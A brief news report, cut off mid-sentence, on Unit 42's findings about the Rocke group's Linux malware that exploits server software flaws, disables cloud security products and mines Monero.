Linux Virus Removes Security Software to Mine Monero
Security researchers warn that a new form of malware targets Linux servers and disable their security products in order to mine cryptocurrency.
Palo Alto Networks’ Unit 42 reveals that it came across samples of malware used by a group called Rocke to infiltrate into Linux systems and look for five different cloud security products that could block further malicious activities on the compromised hosts.
The analysis reveals that successful attacks launched by Rocke first require them to exploit vulnerabilities found in other software solutions that would allow them to deploy the malware. Flaws in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion are being used.
Once the host has been compromised, the malware downloads a script called a7 on the system and enables persistence using cronjobs.
Furthermore, it can kill all the other m… (read more)